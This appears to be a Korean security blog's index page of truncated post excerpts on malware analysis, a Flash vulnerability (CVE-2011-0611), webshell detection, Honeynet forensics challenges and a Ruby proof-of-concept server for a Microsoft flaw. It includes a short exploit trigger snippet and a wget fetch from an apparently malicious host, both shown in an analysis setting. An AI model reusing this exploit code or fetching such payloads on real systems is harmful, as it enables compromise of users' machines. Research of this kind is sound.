-
=[ metasploit v3.8.0-dev [core:3.8 api:1.0] + — –=[ 688 exploits – 357 auxiliary – 39 post + — –=[ 217 payloads – 27 encoders – 8 nops =[ svn r12644 updated today (2011.05.17) msf > show payloads Payloads ======== Name Disclosure Date Rank Description —- ————— —- ———– aix/ppc/shell_bind_tcp normal AIX Command Shell, Bind TCP […]
-
CVE-2011-0611 취약점과 관련된 SWF에서 아래와 같인 코드가 확인된다고 한다. Date.prototype.c_fun = SharedObject.prototype.getSize; Date.prototype.getDay = function () { this.c_fun(); }; var eval(0) = new Date(1.41466385537348e-315); (eval(0)).getDay(); Date.prototype.getDay = SharedObject.prototype.getSize; var d = new Date(8.30830068348057E-246); var __callResult_19 = d.getDay();
-
최근에 Adobe Flash 취약점 (CVE-2011-0611) 이 발표되었다. 그리고 해당 취약점은 지난 주말에 악성코드 유포에 이용되어 국내에 관련 악성코드 피해건수가 꽤나 높게 나왔다. 이번에 해당 취약점을 분석하면서 흥미로운 포스팅을 하나 보았다. 기존 웹을 통해 유포되는 악성코드는 대부분 취약점을 통해 쉘코드를 실행하는데, 이 쉘코드는 대부분 악성코드를 Download & Excute 하는 쉘코드이다. 하지만 이번에 이용된 쉘코드는 기존과 달랐다. […]
-
오늘 웹쉘 탐지와 관련하여 흥미로운 툴을 봐서 기록에 남깁니다. 웹쉘 탐지와 관련해서 국내에도 많은 솔루션이 나와 있는데 이 툴 또한 꽤나 퍼포먼스도 좋고 잘 탐지하는거 같습니다. 무엇보다 obfuscated 된 파일에 대해서도 탐지를 할 수 있다는 점이 신선하네요. 탐지 방법은 엔트로피를 이용하여 통계적인 방법을 이용해 탐지하는 것으로 보입니다. 다운로드 : https://github.com/Neohapsis/NeoPI 간단하게 제 리눅스 서버에 몇가지 […]
-
최근에 새로운 루틴으로 암호화 하는 형태를 발견하여 분석 하였습니다. 코드를 확인한 결과 기존에 작성했던 스크립트로는 복호화가 되지 않아 조금 수정하였습니다. (기존에 작업한 스크립트 : https://jjoon.net/page/?p=238) 수정한 코드로 작업한 내용입니다. D:\Python Programming\Python Code\Malware\Script Analysis>wget http://wkmf.swim.org/bbs/images/top.gif –2011-04-07 00:06:33– http://wkmf.swim.org/bbs/images/top.gif Resolving wkmf.swim.org (wkmf.swim.org)… 121.189.59.232 Connecting to wkmf.swim.org (wkmf.swim.org)|121.189.59.232|:80… connected. HTTP request sent, awaiting response… 200 OK Length: 74556 […]
-
이번 첼린지는 메모리 덤프에 대한 분석인데, 처음 해보는거라 풀이를 참고했다. 우선 Volatility 툴을 처음 알게되었고 사용법을 어느정도 익히게 된거 같아 나름 뿌듯하다. http://www.honeynet.org/challenges/2010_3_banking_troubles 1. List the processes that were running on the victim’s machine. Which process was most likely responsible for the initial exploit? (2pts) 우선 프로세스 리스트는 Volatility (https://www.volatilesystems.com/default/volatility) 를 이용하여 확인할 수 있다. […]
-
두번째 문제이다. 이번 문제는 평소에 자주 분석하던 유형의 문제라 재밌게 푼거 같다. URL : http://www.honeynet.org/challenges/2010_2_browsers_under_attack 1. List the protocols found in the capture. What protocol do you think the attack is/are based on? (2pts) 전체 패킷이 745개 이며 이중 553개가 TCP 프로토콜이며 이중 126개가 HTTP 프로토콜이다. 따라서 HTTP를 통해 공격이 이루어 졌을것으로 보인다. 확인은 Wireshark에서 […]
-
예전부터 한번 풀어봐야지 하고 생각했던걸 이제서야 풀어보려고 한다. 영어의 압박이 있긴 하지만……. URL : http://www.honeynet.org/node/504 1. Which systems (i.e. IP addresses) are involved? (2pts) 1번 문제는 간단하게 어떤 시스템이 관여되어 있는지 확인하는 문제이다. Wireshark를 통해 Conversations 기능을 이용하여 확인하면 쉽게 확인할 수 있다. 대충 몇몇 패킷을 확인하니 공격자는 98.114.205.102 시스템이며 공격 받는쪽은 192.150.11.111 시스템이다. 2. […]
-
CC Attack에 대해서 기본적인 내용만 알고 있었고 세부적으로 몰라 오늘 검색을 해보았습니다. 네이버나 구글 등에서 검색을 하니 User-Agent 필드에 Cache-Control 필드를 넣어 공격을 한다고 나오군요. 보통 넣는 옵션값은 no-store, must-revalidate 이라고 하네요. 음. 여기서 의문이 하나 들었는데 왜 User-Agent 필드에 넣는걸까요? Cache-Control 이라는 필드가 있는데 여기 들어가야 하는게 아닐까요? User-Agent에 넣었는데 Cache-Control 옵션이 먹혀서 웹서버에 […]
-
#!/usr/bin/env ruby # http://breakingpointsystems.com/community/blog/microsoft-vulnerability-proof-of-concept # Nephi Johnson require 'socket' def http_send(sock, data, opts={}) defaults = {:code=>"200", :message=>"OK", :type=>"text/html", :desc=>"content"} opts = defaults.merge(opts) code = opts[:code] message = opts[:message] type = opts[:type] date_str = Time.now.gmtime.strftime("%a, %d %b %Y %H:%M:%S GMT") headers = "HTTP/1.1 #{code} #{message}\r\n" + "Date: #{date_str}\r\n" + "Content-Length: #{data.length}\r\n" + "Content-Type: #{type}\r\n\r\n" puts "[+] […]